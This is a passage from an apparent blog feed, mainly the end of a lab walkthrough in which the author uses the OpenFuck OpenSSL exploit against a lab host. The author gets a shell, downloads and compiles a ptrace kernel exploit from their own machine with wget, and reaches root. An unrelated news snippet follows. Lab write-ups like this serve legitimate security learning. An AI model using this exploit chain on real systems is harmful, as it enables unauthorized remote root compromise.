* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80ffe70
Ready to send shellcode
Spawning shell...
Good Bye!

Doesn't look like it so lets try the other one


root@kali:~# ./openfuck 0x6b 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
ace-kmod.c; rm ptrace-kmod.c; ./p; wget 172.16.2.21/ptrace-kmod.c; gcc -o p ptr
--15:08:48-- http://172.16.2.21/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 172.16.2.21:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 4,128 [text/x-csrc]

0K .... 100% @ 3.94 MB/s

15:08:48 (3.94 MB/s) - `ptrace-kmod.c' saved [4128/4128]

/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
pwd
/tmp
whoami
root

We have root! Also it might take a couple times of running OpenFuck before it works but it will work if all is set up correctly. In another post i'll go over troubleshooting for OpenFuck since I had a hard time after doing a dist-upgrade of kali. Hope y'all enjoy these walk throughs.

In the news: "EE.UU. se ha convertido en un auténtico gulag, donde vivimos con la bota sobre nuestro rostro" - RT en Español - Noticias internacionales


RT en Español - Noticias internacionales

"EE.UU. se ha convertido en un auténtico gulag, donde vivimos con la bota sobre nuestro rostro"
RT en Español - Noticias internacionales
En este episodio de 'Keiser Report', Max Keiser y Stacy Herbert abordan cómo se ha acabado con la privacidad en Internet por un miserable millón de dólares. En la segunda parte de la emisión Max prosigue su entrevista a Jaromil, de Dyne.org, sobre las ...

and more »
Older posts are this way If this message doesn't go away, click anywhere on the page to continue loading posts.
Could not load more posts
Maybe Soup is currently being updated? I'll try again automatically in a few seconds...
Just a second, loading more posts...
You've reached the end.

Don't be the product, buy the product!

Schweinderl